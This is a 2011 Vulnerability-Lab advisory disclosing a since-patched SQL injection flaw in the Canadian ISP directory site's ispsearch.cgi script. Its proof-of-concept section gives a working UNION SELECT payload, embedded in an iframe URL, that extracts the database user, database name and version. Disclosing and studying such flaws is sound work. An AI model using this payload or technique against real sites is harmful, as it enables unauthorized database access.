CanadianISP.ca SQL Injection

`Title:  
======  
Canadian ISP Website - SQL Injection Vulnerability  
  
  
Date:  
=====  
2011-09-23  
  
  
  
VL-ID:  
=====  
282  
  
  
Reference:  
==========  
http://www.vulnerability-lab.com/get_content.php?id=282  
  
  
Introduction:  
=============  
Canadianisp.ca - Is a wholly owned project of Marc Bissonnette /  
InternAlysis.  
It was originally created as a joint venture with Bob Carrick of Carrick  
Solutions, with sole ownership  
transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca  
is the only website that allows  
you to search for an Internet service provider (Dial-up, ISDN, DSL,  
Cable, Satellite, Point to Point, Wireless  
and Voice Over IP (VoIP)) anywhere in Canada. Customers can post  
reviews, and ISPs submit their own services.  
All for free. CanadianISP is also one of the most accurate and most  
up-to-date ISP lists on the net. There are  
many ISP lists out there, but the vast majority of them (as far as we  
have seen and we last searched and looked  
in April of 2011) are out of date, listing companies no longer in  
business, no longer providing connectivity  
or simply pages of ads with no relevance to the users search parameters.  
ISPs can submit and edit / update their own services at all times, free  
of charge.  
  
(Copy of the Vendor Homepage: www.canadianisp.ca/about.htm)  
  
  
Abstract:  
=========  
Vulnerability-Lab Team discovered a critical remote SQL Injection  
vulnerability on the Canadian ISP main vendor website.  
  
  
Report-Timeline:  
================  
2011-09-24: Vendor Notification  
2011-10-03: Vendor Response/Feedback  
2011-10-04: Vendor Fix/Patch  
2011-10-04: Public or Non-Public Disclosure  
  
  
Status:  
========  
Published  
  
  
Affected Products:  
==================  
Canadian ISP Website - 2011/Q2-3  
  
  
Exploitation-Technique:  
=======================  
Remote  
  
  
Severity:  
=========  
Critical  
  
  
Details:  
========  
A SQL Injection vulnerability is detected on canadians isp website. The  
bug allows remote attackers to inject/execute  
own sql statements/commands over a vulnerable applicataion parameter on  
the main web service. Successful exploitation  
of the remote sql injection vulnerability can result in database  
managemtn system compromise & website manipulations.  
  
Vulnerable Module(s):  
[+] ispsearch.cgi  
  
Vulnerable Param(s):  
[+] ispid  
  
  
Pictures:  
../1.png  
  
  
Proof of Concept:  
=================  
The vulnerability can be exploited by remote attackers without user  
inter action. For demonstration or reproduce ...  
  
<html>  
<head><body>  
<title>Remote SQL Injection PoC - CANADIAN ISP</title>  
<iframe  
src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetail&ispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,  
48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,  
101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,  
135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,  
169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,  
203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,  
237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,  
271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,  
305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,  
339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,  
373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,  
407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,  
441,442,443,444,445,446,447-->  
<br><br>  
</body></head>  
</html>  
  
  
Risk:  
=====  
The security risk of the remote sql injection vulnerability is estimated  
as critical.  
  
  
Credits:  
========  
Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN]  
  
  
Disclaimer:  
===========  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability-Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-  
Lab or its suppliers are not liable in any case of damage, including  
direct, indirect, incidental, consequential loss of business  
profits or special damages, even if Vulnerability-Lab or its suppliers  
have been advised of the possibility of such damages. Some  
states do not allow the exclusion or limitation of liability for  
consequential or incidental damages so the foregoing limitation  
may not apply. Any modified copy or reproduction, including partially  
usages, of this file requires authorization from Vulnerability-  
Lab. Permission to electronically redistribute this alert in its  
unmodified form is granted. All other rights, including the use of  
other media, are reserved by Vulnerability-Lab or its suppliers.  
  
Copyright © 2011|Vulnerability-Lab  
  
--   
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com  
Contact: [email protected] or [email protected]  
  
`